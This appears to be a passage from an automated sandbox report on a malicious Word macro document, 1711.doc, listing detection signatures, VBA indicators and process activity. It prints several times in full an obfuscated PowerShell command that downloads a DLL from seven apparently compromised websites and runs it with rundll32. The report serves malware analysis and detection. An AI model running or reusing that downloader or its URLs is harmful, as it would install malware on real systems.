Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615BDA2D	14_2_615BDA2D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615A2A80	14_2_615A2A80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615BDC5D	14_2_615BDC5D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615B7C47	14_2_615B7C47
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615B1CD0	14_2_615B1CD0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615BAE3B	14_2_615BAE3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615A5EE0	14_2_615A5EE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067441E	16_2_0067441E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068CAA8	16_2_0068CAA8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_006843B3	16_2_006843B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068406E	16_2_0068406E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00671C76	16_2_00671C76
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00672A46	16_2_00672A46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00673845	16_2_00673845
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00672043	16_2_00672043
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068E441	16_2_0068E441
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067A048	16_2_0067A048
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00679A57	16_2_00679A57
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00672654	16_2_00672654
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067EC27	16_2_0067EC27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067D223	16_2_0067D223
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00679E22	16_2_00679E22
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00685220	16_2_00685220
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00691A3C	16_2_00691A3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068F83F	16_2_0068F83F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00674C00	16_2_00674C00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00671A0A	16_2_00671A0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067220A	16_2_0067220A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00678C09	16_2_00678C09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067F41F	16_2_0067F41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00681C10	16_2_00681C10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067E21C	16_2_0067E21C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068AEEB	16_2_0068AEEB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068ECE3	16_2_0068ECE3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_006730F6	16_2_006730F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068A8F0	16_2_0068A8F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068DEF4	16_2_0068DEF4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068BEC9	16_2_0068BEC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00680ADE	16_2_00680ADE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_006908D1	16_2_006908D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00687ED1	16_2_00687ED1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068CCD4	16_2_0068CCD4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_006844AA	16_2_006844AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067FEA0	16_2_0067FEA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067DAAE	16_2_0067DAAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_006878A5	16_2_006878A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068D6A7	16_2_0068D6A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_006890BA	16_2_006890BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00675AB2	16_2_00675AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_006898BD	16_2_006898BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00684E8A	16_2_00684E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068748A	16_2_0068748A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00677283	16_2_00677283
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067CC8D	16_2_0067CC8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00690687	16_2_00690687
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067AC95	16_2_0067AC95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068AC9B	16_2_0068AC9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00673C91	16_2_00673C91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068D091	16_2_0068D091
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068056A	16_2_0068056A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00681F6B	16_2_00681F6B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068577E	16_2_0068577E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00673345	16_2_00673345
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068F14D	16_2_0068F14D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00691343	16_2_00691343
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00673F5C	16_2_00673F5C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067C158	16_2_0067C158
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0069292B	16_2_0069292B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00676B25	16_2_00676B25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00675923	16_2_00675923
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00690B34	16_2_00690B34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00673502	16_2_00673502
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00672309	16_2_00672309
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068FD10	16_2_0068FD10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067251C	16_2_0067251C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068BFE8	16_2_0068BFE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_006755E8	16_2_006755E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_006903F1	16_2_006903F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067C5FE	16_2_0067C5FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00676FC4	16_2_00676FC4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_006925C3	16_2_006925C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067A3DF	16_2_0067A3DF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00684BAA	16_2_00684BAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00689DA1	16_2_00689DA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00682FA2	16_2_00682FA2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067BFB6	16_2_0067BFB6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00687BB2	16_2_00687BB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068B1B5	16_2_0068B1B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00679384	16_2_00679384
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00684D8D	16_2_00684D8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067758F	16_2_0067758F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00674F8E	16_2_00674F8E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068D99A	16_2_0068D99A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0067FD91	16_2_0067FD91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00691193	16_2_00691193
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068B397	16_2_0068B397

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~WRF{3FBF80BF-E144-402A-AB00-22C522DF80B7}.tmp.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Abnormal high CPU Usage

Source: C:\Windows\SysWOW64\rundll32.exe

Process Stats: CPU usage > 98%

Tries to load missing DLLs

Source: C:\Windows\System32\svchost.exe	Section loaded: xboxlivetitleid.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cdpsgshims.dll			Jump to behavior

Yara signature match

Source: C:\Users\user\AppData\Local\Temp\~DFE2F261E3909AA4D4.TMP, type: DROPPED

Matched rule: SUSP_VBA_FileSystem_Access date = 2019-06-21, author = Florian Roth, description = Detects suspicious VBA that writes to disk and is activated on document open, reference = Internal Research, score = 52262bb315fa55b7441a04966e176b0e26b7071376797e35c80aa60696b6d6fc

Creates files inside the system directory

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: String function: 615B5BE0 appears 49 times

Document contains an embedded VBA macro which executes code when the document is opened / closed

Source: 1711.doc	OLE, VBA macro line: Private Sub Document_Open()
Source: VBA code instrumentation	OLE, VBA macro: Module bvkaeiku2ncoi2uho3ihdes, Function Document_Open	Name: Document_Open
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE, VBA macro line: Private Function JbxHook_Open_3__ob_set(jbxline, ByRef jbxthis, ByRef jbxparam0, ByRef jbxparam1, ByRef jbxparam2)
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE, VBA macro line: Static jbxtresh_Open As Integer
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE, VBA macro line: Set JbxHook_Open_3__ob_set = jbxthis.Open(jbxparam0, jbxparam1, jbxparam2)
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_3__ob_set
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE, VBA macro line: Set WB = JbxHook_Open_3__ob_set(28, Workbooks, FileName, False, True)
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE, VBA macro line: Private Sub Document_Open()

Contains functionality to call native functions

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_615A13F0 zwxnlwalmcbgmt,

14_2_615A13F0

Document contains no OLE stream with summary information

Source: 1711.doc	OLE indicator has summary info: false
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE indicator has summary info: false
Source: ~WRF{3FBF80BF-E144-402A-AB00-22C522DF80B7}.tmp.0.dr	OLE indicator has summary info: false

Document contains embedded VBA macros

Source: 1711.doc	OLE indicator, VBA macros: true
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE indicator, VBA macros: true

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOC@27/26@2/24

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_615AEBD0 LoadLibraryExW,LoadLibraryExW,LoadLibraryExW,FindResourceW,LoadResource,SizeofResource,MultiByteToWideChar,FreeLibrary,

14_2_615AEBD0

Source: 1711.doc	OLE document summary: title field not present or empty
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE document summary: title field not present or empty
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE document summary: author field not present or empty
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE document summary: edited time not present or 0
Source: ~WRF{3FBF80BF-E144-402A-AB00-22C522DF80B7}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{3FBF80BF-E144-402A-AB00-22C522DF80B7}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{3FBF80BF-E144-402A-AB00-22C522DF80B7}.tmp.0.dr	OLE document summary: edited time not present or 0

Source: 1711.doc	Virustotal: Detection: 39%
Source: 1711.doc	Metadefender: Detection: 20%
Source: 1711.doc	ReversingLabs: Detection: 57%

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWow64\rundll32.exe" C:\ProgramData\13791789.dll,f1158194191
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\13791789.dll",Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk",OlFSBFftEbm
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Pnxoind\oxhesd.gzk",Control_RunDLL
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWow64\rundll32.exe" C:\ProgramData\13791789.dll,f1158194191	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\13791789.dll",Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk",OlFSBFftEbm	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Pnxoind\oxhesd.gzk",Control_RunDLL	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{c53e07ec-25f3-4093-aa39-fc67ea22e99d}\InProcServer32

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\{E3FF1F0A-4208-4AB1-BD02-5AC59AFBF013} - OProcSessId.dat

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_615ABC70 SHGetFolderPathW,CoCreateInstance,

14_2_615ABC70

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWow64\rundll32.exe" C:\ProgramData\13791789.dll,f1158194191

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6404:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3940:120:WilError_01

Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source: ~WRF{3FBF80BF-E144-402A-AB00-22C522DF80B7}.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj			Jump to behavior

Obfuscated command line found

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
